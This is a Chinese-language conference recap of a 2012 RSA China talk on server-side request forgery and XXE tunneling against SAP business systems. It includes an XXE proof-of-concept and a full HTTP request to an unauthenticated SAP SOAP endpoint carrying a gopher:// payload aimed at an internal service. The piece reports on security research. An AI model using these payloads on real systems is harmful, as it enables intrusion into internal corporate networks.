RSA2012议题之《SSRF:针对关键业务应用的新威胁》

Author:g.r0b1n
Site:http://www.freebuf.com  

RSA China 2012议题整理下,第一个选择了ERPScan公司CTO Alexander Polyakov 的议题,刚在ERPScan官方网站看到英文的标题《SSRF vs Business Critical Applications: XXE Tunneling in SAP》。该议题很有亮点,让我觉得这次RSA China 2012不虚此行。

周二上午11点多议题正式开始,Alexander还是很帅气的 


目录
企业应用程序
  定义
  典型企业环境
  企业威胁和防御
SSRF
  发展历程
  类型
  XXE隧道
使用SSRF攻击SAP
  旧攻击的新活力
  绕过安全限制
  利用其它服务
结论


备注:以上目录是我现场记录,因时间紧迫可能有遗漏,大家也可参考英文PDF的目录。

首先我先说下SSRF,全称为服务器端请求伪造(Server Side Request Forgery)。ERP作为大企业必备的办公应用之一,其重要程序不言而喻,而SAP正是其中最出名的一个ERP提供商。由于SAP的应用系统能够被恶意操纵部分或者全部与服务器端的通信数据包,如Alexander所说,SAP的系统不够安全,包括Oracle JRE的所有应用系统都不够安全。

一般的,ERP系统都和企业内网相连,如果ERP遭到攻击,那么可能会被黑客轻松进入内网。Alexander给出了一个ERP部署的模型:

可以看出ERP系统位于子网中,部署有防火墙、IDS,也会定期打补丁。

理想的SSRF:
必须运行数据包发送至任意端口,不需验证身份

SSRF的类型:
受信任的SSRF远程SSRF,其中远程SSRF又分三个子类型:

从图中可以看出远程SSRF的三个子类型的区别在于所能够控制发送的数据包的大小。

利用SSRF可以做什么 


扫描端口和IP地址
远程文件读取
SMBRelay
其它HTTP攻击
通过XXE的其他协议攻击


关于XXE隧道

Alexander在会上详细说了xxe隧道攻击,给我的感觉类似xml inject,xxe demo的代码:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
 <!ELEMENT foo ANY >
 <!ENTITY xxe1 SYSTEM “http://172.16.0.1:80/someservice" >]>
<foo>&xxe1;</foo>


或者


POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 172.16.10.63:8001
Content-Length: 621
 
<?xml  version="1.0"  encoding="UTF-8"?><!DOCTYPE  in  [<!ENTITY  ltt SYSTEM
"gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00
%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%
00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%0
0%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9
%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00
%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%
43%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%7
9%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00
%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C
%5F%57%35%7C%0A%00%00%00%B8%EE">]><dmsg:generate
xmlns:dmsg='http://sap.com/fun/dilbert/msg'
title='&ltt;'>1</dmsg:generate>


SAP中提供了很多XML的接口,许多都易受到攻击,不过大部分都需要身份验证,但是ERPScan的研究团队发现了一个不需要验证的接口。

通过XXE隧道可以: 


利用OS Vuls
利用旧的SAP App Vuls
ByPass SAP安全限制
利用本地服务漏洞


结论

Oracle JRE的所有应用程序都易受到攻击

最后如果有兴趣大家可以到ERPScan的官方网站下载该议题的英文版本:http://erpscan.com/publications/ssrf-vs-business-critical-applications-xxe-tunelling-in-sap/
[via focusecurity]

源链接

Hacking more

...